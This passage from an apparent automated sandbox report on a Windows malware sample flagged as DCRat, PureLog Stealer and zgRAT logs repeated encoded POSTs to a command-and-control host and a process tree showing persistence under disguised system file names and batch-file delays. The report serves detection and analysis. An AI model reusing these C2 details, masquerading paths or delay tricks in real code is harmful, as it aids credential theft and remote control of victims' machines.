content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49961	172.67.220.198	80	3540	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:07:56.659665108 CET	302	OUT	POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 480344cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 12, 2025 01:07:57.005796909 CET	344	OUT	Data Raw: 05 00 01 02 06 0c 01 02 05 06 02 01 02 02 01 0a 00 0a 05 0b 02 01 03 0d 01 56 0c 0c 07 02 01 53 0d 53 04 0c 02 03 04 01 0e 04 07 05 07 0a 06 01 03 0a 0b 09 0d 55 06 57 04 07 07 07 04 55 07 5b 01 53 0e 00 00 0f 06 05 0e 04 0f 03 0a 0d 0c 01 05 03 Data Ascii: VSSUWU[SS\L}S\|YvMc[bXuuRhB}wUlBhMty\|UxNyXhShtw^L}u~V@zm\L~be
Jan 12, 2025 01:07:57.126224041 CET	25	IN	HTTP/1.1 100 Continue
Jan 12, 2025 01:07:57.373271942 CET	1019	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 00:07:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBE180C8CPHP2uEmh55gn8lAFXWJjx3N8mQ77oX%2FXOhl6%2FHbh%2F0pHh8ZZoHl17IUv3M4WUbaHWEPgzj4krWqf60z6%2F5x67TTn1PbDB2WgnwL6Zt4GVyAGfMz0unvS0biICBNHsGQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9008e8c5cbd1de98-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3941&min_rtt=1639&rtt_var=5220&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=646&delivery_rate=72774&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.7	49974	172.67.220.198	80

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:08:01.226008892 CET	367	OUT	POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 480344cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 12, 2025 01:08:01.584486008 CET	344	OUT	Data Raw: 00 04 04 0d 06 01 01 0a 05 06 02 01 02 03 01 01 00 00 05 0a 02 01 03 0d 03 03 0d 03 05 07 03 07 0e 56 06 0e 07 00 04 01 0f 04 06 00 07 0b 04 05 03 0a 0c 09 0e 06 05 0b 05 00 07 0d 06 0a 04 09 01 07 0d 09 05 53 07 00 0d 03 0e 02 0f 57 0d 03 02 02 Data Ascii: VSWPWUUQR\L}R\|^vt[mBvfoTB[B`k]hM`IxoxYoszIh}p`I]Zu~V@xSzO~be
Jan 12, 2025 01:08:01.670216084 CET	25	IN	HTTP/1.1 100 Continue
Jan 12, 2025 01:08:01.908375978 CET	1025	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 00:08:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1veL%2BvL5t7%2Fka02OnGC22r3%2B3r%2FWO9J7RL3BSn%2BcPyPuU43APMIogIlQvpXZGrPybX6Qw59234yPCGzo0tWUHLgmma1ofp44Lze1gNGcuzjAh5TzoHCLZmLHfO8S03Hx3i2cPunM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9008e8e22d401885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2477&min_rtt=1684&rtt_var=2217&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=711&delivery_rate=181840&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.7	49975	172.67.220.198	80

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:08:27.838195086 CET	314	OUT	POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 480344cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 12, 2025 01:08:28.193239927 CET	344	OUT	Data Raw: 05 07 04 04 06 0d 01 07 05 06 02 01 02 00 01 0b 00 06 05 08 02 0c 03 0f 03 02 0f 06 04 53 03 55 0e 0f 06 0c 02 04 04 51 0e 50 02 04 05 06 02 0e 06 53 0b 01 0f 53 06 52 07 57 06 56 01 06 05 0a 00 00 0a 0d 06 06 06 01 0d 07 0e 55 0c 05 0f 08 04 03 Data Ascii: SUQPSSRWVUWTR\L}U~peZw\n\a[]PhB}BthLkZhIoRQJl^vh}l`IlLju~V@z}bArS
Jan 12, 2025 01:08:28.295558929 CET	25	IN	HTTP/1.1 100 Continue
Jan 12, 2025 01:08:28.530555964 CET	1022	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 00:08:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6nz7QmNTYtI0ReezHybO9bQptEclSEmPJSCjKn4b3ddMXJ%2BETZ611TUm1d7ohqhhJrFS%2Fybdu1bEpUBFiUhhH73aFErvCn%2F%2BTPj9QZYd4MyXiQsIRACdO3qf4Zt1UW4HKfz%2BCLK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9008e9889f6b8cd7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8545&min_rtt=2068&rtt_var=13730&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=658&delivery_rate=27094&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.7	49976	172.67.220.198	80

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:08:36.309705973 CET	349	OUT	POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 480344cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 12, 2025 01:08:36.662116051 CET	344	OUT	Data Raw: 05 07 04 0c 06 0f 04 05 05 06 02 01 02 0d 01 00 00 0a 05 0a 02 05 03 0c 00 0e 0d 50 04 0f 02 08 0d 03 07 59 00 56 05 05 0d 03 07 06 06 0a 05 01 06 53 0e 09 0e 04 07 04 01 06 06 56 06 04 04 0e 00 05 0e 09 07 04 06 52 0b 01 0b 01 0f 02 0f 02 04 02 Data Ascii: PYVSVRVQ\L~\|`bMcbPYu\\|AjXvlXhMk_{Uso^_Yh~Tvgk\u~V@xC\O}ba
Jan 12, 2025 01:08:36.753104925 CET	25	IN	HTTP/1.1 100 Continue
Jan 12, 2025 01:08:36.994132996 CET	1029	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 00:08:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqyp%2FQUecdIKjErhxusLxdmk08BagoUzOyx0hwedft%2F2LVQjCjvkH06V%2FLirgeptU%2BmXb1j0B%2FK85sOqGZA0P59gTY%2FG4AGcCLBQxn7lcafjass%2BWvyToC9u%2Bat5R0rqDrmJvutt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9008e9bd7fb9437f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1663&rtt_var=780&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=638111&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.7	49977	172.67.220.198	80

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:09:00.663089037 CET	350	OUT	POST /lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 480344cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 12, 2025 01:09:01.021403074 CET	344	OUT	Data Raw: 05 01 04 0c 06 0e 04 01 05 06 02 01 02 06 01 0b 00 0a 05 01 02 04 03 0a 00 02 0a 05 04 50 03 09 0a 03 03 0d 02 56 07 07 0f 07 06 07 07 50 02 06 03 03 0e 5c 0f 52 01 06 04 57 06 56 05 0a 00 08 02 56 0d 0f 07 51 06 05 0e 52 0d 0f 0e 04 0f 51 02 06 Data Ascii: PVP\RWVVQRQPW\L~h`~`\mvfpB~\|~^cUw_kZtoBUxpfhncP`^w_~_~V@Bz}\}ry
Jan 12, 2025 01:09:01.107140064 CET	25	IN	HTTP/1.1 100 Continue
Jan 12, 2025 01:09:01.333620071 CET	1019	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lxg2EPhEQIV7Dsm8PLAsYkwrew0T5tPipqOy14h2ILIU1ZItHDJ5XTxQuF2JkzylTD7W257r%2BMq1r6WVXitXJk9b%2FSEFUSCbLfvfDf0u9Aaq7b12Iu9zjx6Vn2EexQbDDeXJ2vUb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9008ea55acc74325-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2365&min_rtt=1603&rtt_var=2126&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=694&delivery_rate=189561&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Target ID:	0
Start time:	19:06:58
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\VIyu4dC9CU.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\VIyu4dC9CU.exe"
Imagebase:	0xf90000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1241305685.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1299899215.000000001352C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:07:01
Start date:	11/01/2025
Path:	C:\Windows\System32\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sppsvc.exe
Imagebase:	0x7ff782cd0000
File size:	4'630'384 bytes
MD5 hash:	320823F03672CEB82CC3A169989ABD12
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:07:01
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline"
Imagebase:	0x7ff6a49f0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:07:01
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:07:01
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES4065.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP"
Imagebase:	0x7ff6b0c90000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:07:02
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.cmdline"
Imagebase:	0x7ff6a49f0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:07:02
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:07:02
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES42D6.tmp" "c:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP"
Imagebase:	0x7ff6b0c90000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:07:03
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:07:03
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	19:07:03
Start date:	11/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff702500000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:07:03
Start date:	11/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6a0880000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:07:13
Start date:	11/01/2025
Path:	C:\Recovery\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\ctfmon.exe"
Imagebase:	0x670000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	19:07:15
Start date:	11/01/2025
Path:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Imagebase:	0x9f0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:07:16
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:07:16
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	19:07:17
Start date:	11/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff702500000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	19:07:17
Start date:	11/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff715540000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	19:07:19
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	19:07:19
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	19:07:19
Start date:	11/01/2025
Path:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Imagebase:	0xaa0000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	20:09:59
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
Imagebase:	0x7ff68b930000
File size:	289'792 bytes
